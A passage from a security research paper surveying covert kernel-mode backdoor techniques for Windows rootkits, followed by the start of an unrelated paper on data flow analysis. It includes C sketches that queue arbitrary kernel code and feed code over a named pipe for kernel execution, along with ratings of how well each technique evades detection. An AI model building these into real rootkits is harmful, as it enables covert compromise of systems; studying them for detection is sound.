locate it in order to patch it (this is considered possible as many exported
routines reference it in an obvious, patterned way, such as
RtlLookupFunctionEntry). Also, although the structure is guarded by a
non-exported synchronization mechanism (PsLoadedModuleSpinLock in Windows
Server 2008), the first few entries corresponding to the HAL and the kernel
in-memory image itself should be static and safely accessible without
synchronization (after all, neither the HAL nor the kernel in-memory image may
be unloaded after the system has booted). It should be possible to perform an
interlocked exchange to swap the exception directory pointer, provided that
the exception directory is not modified in a fashion that would require
synchronization (e.g. it is only appended to) after the exchange is made. The
size of the exception directory is supplied as a separate value in the
inverted function table entry array and would need to be modified separately,
which may pose a synchronization problem if alterations to the exception
directory are not carefully planned to be safe in all possible contingencies
with respect to concurrent access as the alterations are made. Additionally,
due to the 32-bit RVA based format of the unwind metadata, all exception
handlers for a module must be within 4GB of that module's loaded base address.
This means
that custom exception handlers need to be located within a ``window'' of
memory that is relatively near to a module. Allocating memory at a specific
base address involves additional work, as the memory cannot be at an arbitrary
point in the address space but must be within 4GB of the target. If a caller
can query the address space and request allocations based at a particular
region, however, this is not seen as a particularly insurmountable problem.

Covertness: The principal advantage of this approach is that it allows a
caller to gain control at any point within a module's execution where an
exception is generated without modifying any code or data within the module in
question (provided the module is cached within PsInvertedFunctionTable).
Because the exception directory information for a module is unused after the
cache is populated, integrity checks against the PE header are useless for
detecting the alteration of exception handling behavior for a cached module.
Additionally, PsInvertedFunctionTable is a non-exported, writable kernel-mode
global which affords it some intrinsic protection against simple detection
techniques. A scan of the loaded module list and comparison of exception
directory pointers to those contained within PsInvertedFunctionTable could
reveal most attacks of this nature, however, provided that the loaded module
list retains integrity. Additionally, PatchGuard version 3 appears to guard
key portions of PsInvertedFunctionTable (e.g. to block redirection of the
kernel's exception directory), resulting in a need to bypass PatchGuard for
long-term exploitation on Windows x64 based systems. This is considered a
relatively minor difficulty by the authors.

2.5.7) Delayed Procedures

There are a number of features offered by the Windows kernel that allow device
drivers to asynchronously execute code. Some examples of these features
include asynchronous procedure calls (APCs), deferred procedure calls (DPCs),
work items, threading, and so on. A backdoor can simply use the APIs exposed
by the kernel to schedule, through any number of these mechanisms, a task that
will run arbitrary code in kernel-mode. For example, a backdoor might queue a
kernel-mode APC using the ntdll.dll trick described at the beginning of this
section. When the APC executes, it runs code that has been altered in
ntdll.dll in a kernel-mode context. This same basic concept would work for
all other delayed procedures.

Category: Type II

Origin: This technique makes implicit use of operating system exposed features
and therefore falls into the category of obvious. Greg Hoglund mentions these
in particular in June, 2006[18].

Capabilities: Kernel-mode code execution.

Considerations: The important consideration here is that some of the methods
that support running delayed procedures have restrictions about where the code
pages reside. For example, a DPC is invoked at dispatch level and must
therefore execute code that resides in non-paged memory.

Covertness: This technique is covert in the sense that the backdoor is always
in a transient state of execution and therefore could be considered largely
dormant. Since the backdoor state is stored alongside other transient state
in the operating system, this technique should prove more difficult to detect
when compared to some of the other approaches described in this paper.
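
As a simple illustration of the delayed-procedure approach described in this
subsection, the following sketch queues a work item that later runs in the
context of a system worker thread at PASSIVE_LEVEL; the payload routine is a
placeholder for whatever the backdoor wishes to execute:

#include <ntddk.h>

static WORK_QUEUE_ITEM BackdoorWorkItem;

// Invoked later in the context of a system worker thread.
VOID BackdoorWorkRoutine(PVOID Context)
{
    UNREFERENCED_PARAMETER(Context);

    // arbitrary kernel-mode code would run here
}

VOID QueueBackdoorWork(VOID)
{
    ExInitializeWorkItem(&BackdoorWorkItem, BackdoorWorkRoutine, NULL);
    ExQueueWorkItem(&BackdoorWorkItem, DelayedWorkQueue);
}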

2.6) Asynchronous Read Loop

It's not always necessary to hook some portion of the kernel when attempting
to implement a local kernel-mode backdoor. In some cases, it's easiest to
just make use of features included in the target operating system to blend in
with normal behavior. One particularly good candidate for this involves
abusing some of the features offered by the Windows I/O (input/output)
manager.

The I/O model used by Windows has many facets to it. For the purposes of this
paper, it's only necessary to have an understanding of how it operates when
reading data from a file. To support this, the kernel constructs an I/O
Request Packet (IRP) with its MajorFunction set to IRP_MJ_READ. The kernel then
passes the populated IRP down to the device object that is related to the file
that is being read from. The target device object takes the steps needed to
read data from the underlying device and then stores the acquired data in a
buffer associated with the IRP. Once the read operation has completed, the
kernel will call the IRP's completion routine if one has been set. This gives
the original caller an opportunity to make forward progress with the data that
has been read.

This very basic behavior can be effectively harnessed in the context of a
backdoor in a fairly covert fashion. One interesting approach involves a
user-mode process hosting a named pipe server and a blob of kernel-mode code
reading data from the server and then executing it in the kernel-mode context.
This general behavior would make it possible to run additional code in the
kernel-mode context by simply shuttling it across a named pipe. The specifics
of how this can be made to work are almost as simple as the steps described in
the previous paragraph.

The user-mode part is simple: create a named pipe server using CreateNamedPipe
and then wait for a connection. The kernel-mode part is more interesting.
One basic idea might involve having a kernel-mode routine that builds an
asynchronous read IRP where the IRP's completion routine is defined as the
kernel-mode routine itself. In this way, when data arrives from the user-mode
process, the routine is notified and given an opportunity to execute the code
that was supplied. After the code has been executed, it can simply re-use the
code that was needed to pass the IRP to the underlying device associated with
the named pipe that it's interacting with. The following pseudo-code
illustrates how this could be accomplished:

KernelRoutine(DeviceObject, ReadIrp, Context)
{
    // First time called, ReadIrp == NULL
    if (ReadIrp == NULL)
    {
        FileObject = OpenNamedPipe(...)
    }
    // Otherwise, called during IRP completion
    else
    {
        FileObject = GetFileObjectFromIrp(ReadIrp)

        RunCodeFromIrpBuffer(ReadIrp)
    }
    DeviceObject = IoGetRelatedDeviceObject(FileObject)
    ReadIrp = IoBuildAsynchronousFsdRequest(...)
    IoSetCompletionRoutine(ReadIrp, KernelRoutine)
    IoCallDriver(DeviceObject, ReadIrp)
}
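
For completeness, the user-mode half of this arrangement might look roughly
like the following sketch. The pipe name and payload bytes are placeholders,
and the kernel-mode component is assumed to open the client end of the pipe
and post its read IRP against it:

#include <windows.h>

int main(void)
{
    unsigned char Payload[] = { 0xC3 };     // placeholder payload
    DWORD Written;
    HANDLE Pipe;

    // Host the server end of the pipe that the kernel-mode component reads.
    Pipe = CreateNamedPipeA("\\\\.\\pipe\\backdoor",
                            PIPE_ACCESS_DUPLEX,
                            PIPE_TYPE_BYTE | PIPE_WAIT,
                            1, 4096, 4096, 0, NULL);

    if (Pipe == INVALID_HANDLE_VALUE)
        return 1;

    // Wait for the kernel-mode component to connect.
    ConnectNamedPipe(Pipe, NULL);

    // Each write completes the pending read IRP in kernel-mode, causing
    // the supplied bytes to be executed there.
    WriteFile(Pipe, Payload, sizeof(Payload), &Written, NULL);

    CloseHandle(Pipe);
    return 0;
}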

Category: Type II

Origin: The authors believe this to be the first public description of this
technique.

Capabilities: Kernel-mode code execution.

Covertness: The authors believe this technique to be fairly covert due to the
fact that the kernel-mode code profile is extremely minimal. The only code
that must be present at all times is the code needed to execute the read
buffer and then post the next read IRP to the target device object. There are
two main strategies that might be taken to detect this technique. The first
could include identifying malicious instances of the target device, such as a
malicious named pipe server. The second might involve attempting to perform
an in-memory fingerprint of the completion routine code, though this would be
far from foolproof, especially if the kernel-mode code is encoded until
invoked.

2.7) Leaking CS

With the introduction of protected mode into the x86 architecture, the concept
of separate privilege levels, or rings, was born. Lesser privileged rings
(such as ring 3) were designed to be restricted from accessing resources
associated with more privileged rings (such as ring 0). To support this
concept, segment descriptors are able to define access restrictions based on
which rings should be allowed to access a given region of memory. The
processor derives the Current Privilege Level (CPL) by looking at the low
order two bits of the CS segment selector when it is loaded. If all bits are
cleared, the processor is running at ring 0, the most privileged ring. If all
bits are set, the processor is running at ring 3, the least privileged ring.

When certain events occur that require the operating system's kernel to take
control, such as an interrupt, the processor automatically transitions from
whatever ring it is currently executing at to ring 0 so that the request may
be serviced by the kernel. As part of this transition, the processor saves
the values of a number of different registers, including the previous value
of CS, to the stack in order to make it possible to pick up execution where it
left off after the request has been serviced. The following structure
describes the order in which these registers are saved on the stack:

typedef struct _SAVED_STATE
{
    ULONG_PTR Eip;
    ULONG_PTR CodeSelector;
    ULONG Eflags;
    ULONG_PTR Esp;
    ULONG_PTR StackSelector;
} SAVED_STATE, *PSAVED_STATE;

Potential security implications may arise if there is a condition where some
code can alter the saved execution state in such a way that the saved CS is
modified from a lesser privileged CS to a more privileged CS by clearing the
low order bits. When the saved execution state is used to restore the active
processor state, such as through an iret, the original caller immediately
obtains ring 0 privileges.

Category: Undefined; this approach does not fit into any of the defined
categories as it simply takes advantage of hardware behavior relating to how
CS is used to determine the CPL of a processor. If code patching is used to
modify the saved CS, then the implementation is Type I.

Origin: Leaking CS to user-mode has been known to be dangerous since the
introduction of protected mode (and thus rings) into the x86 architecture with
the 80286 in 1982[22]. This approach therefore falls into the category of obvious
due to the documented hardware implications of leaking a kernel-mode CS when
transitioning back to user-mode.

Capabilities: Kernel-mode code execution.

Considerations: Leaking the kernel-mode CS to user-mode may have undesired
consequences. Whatever code is to be called in user-mode must take into
account that it will be running in a kernel-mode context. Furthermore, the
kernel attempts to be as rigorous as possible about checking to ensure that a
thread executing in user-mode is not allowed a kernel-mode CS.

Covertness: Depending on the method used to intercept and alter the saved
execution state, this method has the potential to be fairly covert.
If the
method involves secondary hooking in order to modify the state, then it may be
detected through some of the same techniques as described in the section on
image patching.

3) Prevention & Mitigation

The primary purpose of this paper is not to explicitly identify approaches
that could be taken to prevent or mitigate the different types of attacks
described herein. However, it is worth taking some time to describe the
virtues of certain approaches that could be extremely beneficial if one were
to attempt to do so. The subject of preventing backdoors from being installed
and persisted is discussed in more detail in section 4 and therefore won't be
considered in this section.

One of the more interesting ideas that could be applied to prevent a number of
different types of backdoors would be immutable memory. Memory is immutable
when it is not allowed to be modified. There are a few key regions of memory
used by the Windows kernel that would benefit greatly from immutable memory,
such as executable code segments and regions that are effectively write-once,
such as the SSDT. While immutable memory may work in principle, there is
currently no x86 or x64 hardware (that the authors are aware of) that permits
this level of control.

Even though there appears to be no hardware support for this, it is still
possible to implement immutable memory in a virtualized environment. This is
especially true in hardware-assisted virtualization implementations that make
use of a hypervisor in some form. In this model, a hypervisor can easily
expose a hypercall (similar to a system call, but one that traps into the
hypervisor) that would allow an enlightened guest to mark a set of pages as
being immutable. From that point forward, the hypervisor would restrict all
writes to the pages associated with the immutable region.

As mentioned previously, particularly good candidates for immutable memory are
things like the SSDT, the kernel's ALMOSTRO write-once segment, as well as
other single-modification data elements that exist within the kernel.
Enforcing immutable memory on these regions would effectively prevent
backdoors from being able to establish certain types of hooks. The downside
would be that the kernel would lose the ability to hot-patch itself (there are
some instances where kernel-mode hot-patching is currently required,
especially on x64). Still, the security upside would seem to outweigh the
potential downside. On x64, the use of immutable memory would improve the
resilience of PatchGuard by allowing it to actively prevent hot-patching
rather than relying on detecting it with the use of a polling cycle.
While there
may also be additional points, these two represent the common themes
observed by the authors. Unfortunately, the fact is that both of these
points are, at the time of this writing, flawed.

It is currently not possible with present day operating systems and x86/x64
hardware to guarantee that only specific code will run in the context of an
operating system's kernel. Though Microsoft wishes it were possible, as is
clearly illustrated by its efforts in Code Integrity and Trusted Boot, there
is no real way to guarantee that kernel-mode code cannot be exploited in a
manner that might lead to code execution[2]. There has been no shortage of
Windows kernel-mode vulnerabilities to illustrate the feasibility of this type
of vector[6, 10]. This matter is also not helped by the fact that the Windows kernel
currently has very few exploit mitigations. This makes the exploitation of
kernel vulnerabilities trivial in comparison to some of the mitigations found
in user-mode on Windows XP SP2 and, more recently, Windows Vista.

In addition to the exploitation vector, it is also important to consider
alternative ways of executing code in kernel-mode that would be largely
invisible to the kernel itself. John Heasman has provided some excellent
research into the subject of using the BIOS, expansion ROMs, and the
Extensible Firmware Interface (EFI) as a means of running arbitrary code in
the context of the kernel without necessarily relying on any hooks directly
visible to the kernel itself[16, 17]. Loïc Duflot described how to use the System
Management Mode (SMM) of Intel processors as a method of subverting the
operating system to bypass BSD's securelevel restrictions[9]. There has also
been a lot of discussion around using DMA to directly interact with and modify
physical memory without involving the operating system. However, this form of
attack is of less concern due to the fact that physical access is required.

The idea of detecting or preventing a rootkit from persisting data is
something that is worthy of thoughtful consideration. Indeed, it's true that
in order for malware to survive across reboots, it must persist itself in some
form or another. By preventing or detecting this persisted data, it would be
possible to effectively prevent any form of sustained infection. On the
surface, this idea is seemingly both simple and elegant, but the devil is in
the details. The fact that this idea is fundamentally flawed can be plainly
illustrated using the current state of Anti-Virus technology.

For the sake of argument, assume for the moment that there really is a way to
deterministically prevent malware from persisting itself in any form. Now,
consider a scenario where a web server at a financial institution is
compromised and a memory resident rootkit is used. The point here should be
obvious: no data associated with the rootkit touches the physical hardware. In
this example, one might rightly think that the web server will not be rebooted
for an extended period of time. In these circumstances, there is really no
difference between a persistent and non-persistent rootkit. Indeed, a memory
resident rootkit may not be ideal in certain situations, but it's important to
understand the implications.

Based on the current state-of-the-art, it is not possible to deterministically
prevent malware from persisting itself. There are far too many methods of
persisting data.
This is further illustrated by John Heasman in his ACPI and +expansion ROM work. To the authors' knowledge, modern tools focus their +forensic analysis on the operating system and on file systems. This isn't +sufficient, however, as rootkit data can be stored in locations that are +largely invisible to the operating system. While this may be true, there has +been a significant push in recent years to provide the hardware necessary to +implement a trusted system boot. This initiative is being driven by the +Trusted Computing Group with involvement from companies such as Microsoft and +Intel[42]. One of the major outcomes of this group has been the Trusted Platform +Module (TPM) which strives to facilitate a trusted system boot, among other +things[43]. At the time of this writing, the effectiveness of TPM is largely +unknown, but it is expected that it will be a powerful and useful security +feature as it matures. + +The fact that there is really no way of preventing untrusted code from running +in kernel-mode in combination with the fact that there is really no way to +universally prevent untrusted code from persisting itself helps to illustrate +the need for thoughtful consideration of ways to both prevent and detect +kernel-mode backdoors. + +5) PatchGuard versus Rootkits + +There has been some confusion centering around whether or not PatchGuard can +be viewed as a deterrent to rootkits. On the surface, it would appear that +PatchGuard does indeed represent a formidable opponent to rootkit developers +given the fact that it checks for many different types of hooks. Beneath the +surface, it's clear that PatchGuard is fundamentally flawed with respect to +its use as a rootkit deterrent. This flaw centers around the fact that +PatchGuard, in its current implementation, runs at the same privilege level as +other driver code. This opens PatchGuard up to attacks that are designed to +prevent it from completing its checks. The authors have previously outlined +many different approaches that can be used to disable PatchGuard[36, 37]. It is +certainly possible that Microsoft could implement fixes for these attacks, and +indeed they have implemented some in more recent versions, but the problem +remains a cat-and-mouse game. In this particular cat-and-mouse game, rootkit +authors will always have an advantage both in terms of time and in terms of +vantage point. + +In the future, PatchGuard can be improved to leverage features of a hypervisor +in a virtualized environment that might allow it to be protected from +malicious code running in the context of a guest. For example, the current +version of PatchGuard currently makes extensive use of obfuscation in order to +presumably prevent malware from finding its code and context structures in +memory. The presence of a hypervisor may permit PatchGuard to make more +extensive use of immutable memory, or to alternatively run at a privilege +level that is greater than that of an executing guest, such as within the +hypervisor itself (though this could have severe security implications if done +improperly). + +Even if PatchGuard is improved to the point where it's no longer possible to +disable its security checks, there will still be another fundamental flaw. +This second flaw centers around the fact that PatchGuard, like any other code +designed to perform explicit checks, is like a horse with blinders on. It's +only able to detect modifications to the specific structures that it knows +about. 
While it may be true that these structures are the most likely +candidates to be hooked, it is nevertheless true that many other structures +exist that would make suitable candidates, such as the SuspendApc of a +specific thread. These alternative candidates are meant to illustrate the +challenges PatchGuard faces with regard to continually evolving its checks to +keep up with rootkit authors. In this manner, PatchGuard will continue to be +forced into a reactive mode rather than a proactive mode. If IDS products +have illustrated one thing it's that reactive security solutions are largely +inadequate in the face of a skilled attacker. + +PatchGuard is most likely best regarded as a hall monitor. Its job is to make +sure students are doing things according to the rules. Good students, such as +ISVs, will inherently bend to the will of PatchGuard lest they find themselves +in unsupported waters. Bad students, such as rootkits, fear not the wrath of +PatchGuard and will have few qualms about sidestepping it, even if the +technique used to sidestep may not work in the future. + +6) Acknowledgements + +The authors would like to acknowledge all of the people, named or unnamed, +whose prior research contributed to the content included in this paper. + +7) Conclusion + +At this point it should be clear that there is no shortage of techniques that +can be used to expose a local kernel-mode backdoor on Windows. These +techniques provide a subtle way of weakening the security guarantees of the +Windows kernel by exposing restricted resources to user-mode processes. These +resources might include access to kernel-mode data, disabling of security +checks, or the execution of arbitrary code in kernel-mode. There are many +different reasons why these types of backdoors would be useful in the context +of a rootkit. + +The most obvious reason these techniques are useful in rootkits is for the +very reason that they provide access to restricted resource. A less obvious +reason for their usefulness is that they can be used as a method of reducing a +rootkit's kernel-mode code profile. Since many tools are designed to scan +kernel-mode memory for the presence of backdoors[32, 14], any reduction of a +rootkit's kernel-mode code profile can be useful. Rather than placing code in +kernel-mode, techniques have been described for redirecting code execution to +code stored in user-mode in a process-specific fashion. This is accomplished +by redirecting code into a portion of the ntdll mapping which exists in every +process, including the System process. + +Understanding how different backdoor techniques work is necessary in order to +consider approaches that might be taken to prevent or detect rootkits that +employ them. For example, the presence of immutable memory may eliminate some +of the common techniques used by many different types of rootkits. Likewise, +when these techniques are eliminated, new ones will be developed, continuing +the cycle that permeates most adversarial systems. + +References + +[1] AMD. AMD64 Architecture Programmer's Manual Volume 2: System Programming. Dec, 2005. + +[2] Anonymous Hacker. Xbox 360 Hypervisor Privilege Escalation Vulnerability. Bugtraq. Feb, 2007. http://www.securityfocus.com/archive/1/461489 + +[3] Blanset, David et al. Dual operating system computer. + Oct, 1985. http://www.freepatentsonline.com/4747040.html + +[4] Brown, Ralf. Pentium Model-Specific Registers and What They Reveal. + Oct, 1995. 
http://www.rcollins.org/articles/p5msr/PentiumMSRs.html + +[5] Butler, James and Sherri Sparks. Windows Rootkits of 2005. + Nov, 2005. http://www.securityfocus.com/infocus/1850 + +[6] Cerrudo, Cesar. Microsoft Windows Kernel GDI Local Privilege Escalation. + Oct, 2004. http://projects.info-pull.com/mokb/MOKB-06-11-2006.html + +[7] CIAC. E-34: Onehalf Virus (MS-DOS). + Sep, 1994. http://www.ciac.org/ciac/bulletins/e-34.shtml + +[8] Conover, Matt. Malware Profiling and Rootkit Detection on Windows. + 2005. http://xcon.xfocus.org/xcon2005/archives/2005/Xcon2005_Shok.pdf + +[9] Duflot, Loïc. Security Issues Related to Pentium System Management Mode. + CanSecWest, 2006. http://www.cansecwest.com/slides06/csw06-duflot.ppt + +[10] Ellch, John et al. Exploiting 802.11 Wireless Driver Vulnerabilities on Windows. + Jan, 2007. http://www.uninformed.org/?v=6&a=2&t=sumry + +[11] Firew0rker, the nobodies. Kernel-mode backdoors for Windows NT. + Phrack 62. Jan, 2005. http://www.phrack.org/issues.html?issue=62&id=6#article + +[12] fuzenop. SysEnterHook. + Feb, 2005. http://www.rootkit.com/vault/fuzen_op/SysEnterHook.zip + +[13] Garfinkel, Tal. Traps and Pitfalls: Practical Problems in System Call Interposition Based Security Tools. + http://www.stanford.edu/ talg/papers/traps/traps-ndss03.pdf + +[14] Gassoway, Paul. Discovery of kernel rootkits with memory scan. + Oct, 2005. http://www.freepatentsonline.com/20070078915.html + +[15] Gulbrandsen, John. System Call Optimization with the SYSENTER Instruction. + Oct, 2004. http://www.codeguru.com/Cpp/W-P/system/devicedriverdevelopment/article.php/c8223/ + +[16] Heasman, John. Implementing and Detecting an ACPI BIOS Rootkit. + BlackHat Federal, 2006. https://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Heasman.pdf + +[17] Heasman, John. Implementing and Detecting a PCI Rootkit. + Nov, 2006. http://www.ngssoftware.com/research/papers/Implementing_And_Detecting_A_PCI_Rootkit.pdf + +[18] Hoglund, Greg. Kernel Object Hooking Rootkits (KOH Rootkits). + Jun, 2006. http://www.rootkit.com/newsread.php?newsid=501 + +[19] Hoglund, Greg. A *REAL* NT Rootkit, patching the NT Kernel. + Phrack 55. Sep, 1999. http://phrack.org/issues.html?issue=55&id=5 + +[20] Hoglund, Greg and James Butler. Rootkits: Subverting the Windows Kernel. 2006. Addison-Wesley. + +[21] Hunt, Galen and Doug Brubacher. Detours: Binary Interception of Win32 Functions. Proceedings of the 3rd USENIX Windows NT Symposium, pp. 135-143. Seattle, WA, July 1999. USENIX. + +[22] Intel. 2.1.2 The Intel 286 Processor (1982). + Intel 64 and IA-32 Architectures Software Developer's Manual. Denver, Colorado: Intel, 34. http://www.intel.com/products/processor/manuals/index.htm. + + +[23] Intel. IA-32 Intel Architecture Software Developer's Manual Volume 3: System Programming Guide. + Sep, 2005. + +[24] Jack, Barnaby. Remote Windows Kernel Exploitation: Step into the Ring 0. Aug, 2005. http://www.blackhat.com/presentations/bh-usa-05/BH_US_05-Jack_White_Paper.pdf + +[25] Kasslin, Kimmo. Kernel Malware: The Attack from Within. + 2006. http://www.f-secure.com/weblog/archives/kasslin_AVAR2006_KernelMalware_paper.pdf + +[26] Kdm. NTIllusion: A portable Win32 userland rootkit [incomplete]. + Phrack 62. Jan, 2005. http://www.phrack.org/issues.html?issue=62&id=12&mode=txt + +[27] M. B. Jones. Interposition agents: Transparently interposing user code at the system interface. + In Symposium on Operating System Principles, pages 80-93, 1993. 
http://www.scs.stanford.edu/nyu/04fa/sched/readings/interposition-agents.pdf + +[28] Mythrandir. Protected mode programming and O/S development. + Phrack 52. Jan, 1998. http://www.phrack.org/issues.html?issue=52&id=17#article + +[29] PaX team. PAGEEXEC. + Mar, 2003. http://pax.grsecurity.net/docs/pageexec.txt + +[30] Plaguez. Weakening the Linux Kernel. + Phrack 52. Jan, 1998. http://www.phrack.org/issues.html?issue=52&id=18#article + +[31] Prasad Dabak, Milind Borate, and Sandeep Phadke. Hooking Software Interrupts. + Oct, 1999. http://www.windowsitlibrary.com/Content/356/09/1.html + +[32] Rutkowska, Joanna. System Virginity Verifier. + http://invisiblethings.org/tools/svv/svv-2.3-src.zip + +[33] Rutkowska, Joanna. Rookit Hunting vs. Compromise Detection. + BlackHat Europe, 2006. http://invisiblethings.org/papers/rutkowska_bheurope2006.ppt + +[34] Rutkowska, Joanna. Introducing Stealth Malware Taxonomy. + Nov, 2006. http://invisiblethings.org/papers/malware-taxonomy.pdf + +[35] Silvio. Shared Library Call Redirection Via ELF PLT Infection. + Phrack 56. Jan, 2000. http://www.phrack.org/issues.html?issue=56&id=7#article + +[36] skape and Skywing. Bypassing PatchGuard on Windows x64. + Uninformed Journal. Jan, 2006. http://www.uninformed.org/?v=3&a=3&t=sumry + +[37] Skywing. Subverting PatchGuard version 2. + Uninformed Journal. Jan, 2007. http://www.uninformed.org/?v=6&a=1&t=sumry + +[38] Skywing. Anti-Virus Software Gone Wrong. + Uninformed Journal. Jun, 2006. http://www.uninformed.org/?v=4&a=4&t=sumry + +[39] Skywing. Programming against the x64 exception handling support. + Feb, 2007. http://www.nynaeve.net/?p=113 + +[40] Soeder, Derek. Windows Expand-down Data Segment Local Privilege Escalation. + Apr, 2004. http://research.eeye.com/html/advisories/published/AD20040413D.html + +[41] Sparks, Sherri and James Butler. Raising the Bar for Windows Rootkit Detection. + Phrack 63. Jan, 2005. http://www.phrack.org/issues.html?issue=63&id=8 + +[42] Trusted Computing Group. Trusted Computing Group: Home. + https://www.trustedcomputinggroup.org/home + +[43] Trusted Computing Group. TPM Specification. + https://www.trustedcomputinggroup.org/specs/TPM/ + +[44] Welinder, Morten. modifyldt security holes. + Mar, 1996. http://lkml.org/lkml/1996/3/6/13 + +[45] Wikipedia. Call gate. + http://en.wikipedia.org/wiki/Call_gate diff --git a/uninformed/8.6.txt b/uninformed/8.6.txt new file mode 100644 index 0000000..0c4816f --- /dev/null +++ b/uninformed/8.6.txt @@ -0,0 +1,1234 @@ +Generalizing Data Flow Information +Aug, 2007 +skape +mmiller@hick.org + +Abstract: Generalizing information is a common method of reducing the quantity +of data that must be considered during analysis. This fact has been plainly +illustrated in relation to static data flow analysis where previous research +has described algorithms that can be used to generalize data flow information. +These generalizations have helped support more optimal data flow analysis in +certain situations. In the same vein, this paper describes a process that can +be employed to generalize and persist data flow information along multiple +generalization tiers. Each generalization tier is meant to describe the data +flow behaviors of a conceptual software element such as an instruction, a +basic block, a procedure, a data type, and so on. This process makes use of +algorithms described in previous literature to support the generalization of +data flow information. 
To illustrate the usefulness of the generalization process, this paper also
presents an algorithm that can be used to determine reachability at each
generalization tier. The algorithm determines reachability starting from the
least specific generalization tier and uses the set of reachable paths found
to progressively qualify data flow information for each successive
generalization tier. This helps to constrain the amount of data flow
information that must be considered to a minimal subset.

1) Introduction

Data flow analysis uses data flow information to solve a particular data flow
problem such as determining reachability, dependence, and so on. The
algorithms used to obtain data flow information may vary in terms of accuracy
and precision. To help quantify effectiveness, data flow algorithms may
generally be categorized based on specific sensitivities. The first category,
referred to as flow sensitivity, is used to convey whether or not an algorithm
takes into account the implied order of instructions. Path sensitivity is
used to convey whether or not an algorithm considers predicates. Finally,
algorithms may also be context-sensitive if they take into account a calling
context to restrict analysis to realizable paths when considering
interprocedural data flow information.

Data flow information is typically collected by statically analyzing the data
dependence of instructions or statements. For example, conventional def-use
chains describe the variables that exist within the def(), use(), in(), out(),
and kill() sets for each instruction or statement. Understanding data flow
information with this level of detail makes it possible to statically solve a
particular data flow problem. However, the resources needed to represent the
def-use data flow information can be prohibitive when working with large
applications. Depending on the data flow problem, the amount of data flow
information required to come to a solution may be in excess of the physical
resources present on a computer performing the analysis. This physical
resource problem can be solved using at least two general approaches.

The most basic approach might involve simply partitioning, or fragmenting,
analysis information such that smaller subsets are considered individually
rather than attempting to represent the complete set of data flow information
at once[15]. While this would effectively constrain the amount of physical
resources required, it would also directly impact the accuracy and precision
of the underlying algorithm used to perform data flow analysis. For instance,
identifying the ``interesting portion'' of a program may require more state
than can be feasibly obtained in a single program fragment. A second and
potentially more optimal approach might involve generalizing data flow
information. By generalizing data flow information, an algorithm can operate
within the bounds of physical resources by making use of a more abstract view
of the complete set of data flow information. The distinction between the
generalizing approach and the partitioning approach is that the generalized
data flow information should not affect the accuracy of the algorithm since it
should still be able to represent the complete set of generalized data flow
information at once.

There has been significant prior work that has illustrated the effectiveness
of generalizing data flow information when performing data flow analysis.
The def-use information obtained between instructions or statements has been
generalized to describe sets for basic blocks. Horwitz, Reps, and Binkley
describe how a system dependence graph (SDG) can be derived from
intraprocedural data flow information to produce a summary graph which conveys
context-sensitive data flow information at the procedure level[7]. Their paper
went on to describe an interprocedural slicing algorithm that made use of
SDGs. Reps, Horwitz, and Sagiv later described a general framework (IFDS) in
which many data flow analysis problems can be solved as graph reachability
problems[13, 14]. The algorithms proposed in their paper focus on restricting
analysis to interprocedurally realizable paths to improve precision.
Identifying interprocedurally realizable paths has since been compared to the
concept of context-free-language (CFL) reachability (CFL-reachability)[8].
These algorithms have helped to form the basis for techniques used in this
paper to both generalize and analyze data flow information.

This paper approaches the generalization of data flow information by defining
generalization tiers at which data flow information can be conveyed. A
generalization tier is intended to show the data flow relationships between a
set of conceptual software elements. Examples of software elements include an
instruction, a basic block, a procedure, a data type, and so on. To define
these relationships, data flow information is collected at the most specific
generalization tier, such as the instruction tier, and then generalized to
increasingly less-specific generalization tiers, such as the basic block,
procedure, and data type tiers.

To illustrate the usefulness of generalizing data flow information, this paper
also presents a progressive algorithm that can be used to determine
reachability between nodes on a data flow graph at each generalization tier.
The algorithm starts by generating a data flow graph using data flow
information from the least-specific generalization tier. The graph is then
analyzed using a previously described algorithm to determine reachability
between an arbitrary set of nodes. The set of reachable paths found is then
used to qualify the set of more-specific potentially reachable paths found at
the next generalization tier. The more-specific paths are used to construct a
new data flow graph. These steps then repeat using each more-specific
generalization tier until it is not possible to obtain more detailed
information. The benefit of this approach is that a minimal set of data flow
information is considered as a result of progressively qualifying data flow
paths at each generalization tier. It should be noted that different
reachability problems may require state that is prohibitively large. As such,
it is helpful to consider refining a reachability problem to operate more
efficiently by making use of generalized information.

This paper is organized into two sections. Section 2 discusses the algorithms
used to generalize data flow information at each generalization tier. Section
3 describes the algorithm used to determine reachable data flow paths by
progressively analyzing data flow information at each generalization tier. It
should be noted in advance that the author does not claim to be an expert in
this field; rather, this paper is simply an explanation of the author's
current thoughts. These thoughts attempt to take into account previous work
whenever possible to the extent known by the author.
Given that this is the case, the author is more than willing to receive
criticism relating to the ideas put forth in this paper.

2) Generalization

Generalizing data flow information can make it possible to analyze large data
sets without losing accuracy. This section describes the process of
generalizing information at each generalization tier. As a matter of course,
each generalization tier uses data flow information obtained from its
preceding more specific generalization tier. In this way, the basic block
tier generalizes information obtained at the instruction tier, the procedure
tier generalizes information obtained at the basic block tier, and so on. The
algorithms used to generalize information at each generalization tier can have
a direct impact on the accuracy of the information that can be obtained when
used during data flow analysis. The subject of accuracy will be addressed for
each specific tier.

To obtain generalized data flow information, a set of target executable image
files, or modules, must be defined. The target modules serve to define the
context from which data flow information will be obtained and generalized.
The general process used to accomplish this involves visiting each procedure
within each module. For each procedure, data flow information is collected at
the instruction tier and is then generalized to each less-specific tier. To
facilitate the reachability algorithm, it is assumed that as the data flow
information is collected, it is persisted in a form that can be accessed on
demand. The process described in this paper assumes a normalized database is
used to contain the data flow information found at each generalization tier.
In this manner, the upper limit associated with the number of target modules
is tied to the amount of available persistent storage with respect to the
amount required by a given data flow problem.

Before proceeding, it is important to point out that while this paper
describes explicit algorithms for generalizing at each tier, it is entirely
possible to substitute alternative algorithms. This serves to illustrate that
the concept of generalizing information along generalization tiers is
sufficiently abstract to support representing alternate forms of data flow and
control flow information. By using different algorithms, it is possible to
convey different forms of data flow relationships which vary in terms of
precision and accuracy.

2.1) Instruction Tier

Generalizing data flow information presupposes that there is data flow
information to generalize. As such, a base set of data flow information must
be collected first. For the purposes of this paper, the most specific data
flow information is collected at the instruction tier using the Static Single
Assignment (SSA) implementation provided by Microsoft's Phoenix framework,
though other algorithms could just as well be used[11]. SSA is an elegant
solution to the problem of representing data flow information in a
flow-sensitive manner. Each definition and use of a given variable is
expressed in terms of a unique variable version, which makes it possible to
show clear, unambiguous data flow relationships. In cases where data flow
information may merge along control flow paths, SSA makes use of a phi
function which acts as a pseudo-instruction to represent the merge point.
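
To make this representation more concrete, the sketch below shows one possible
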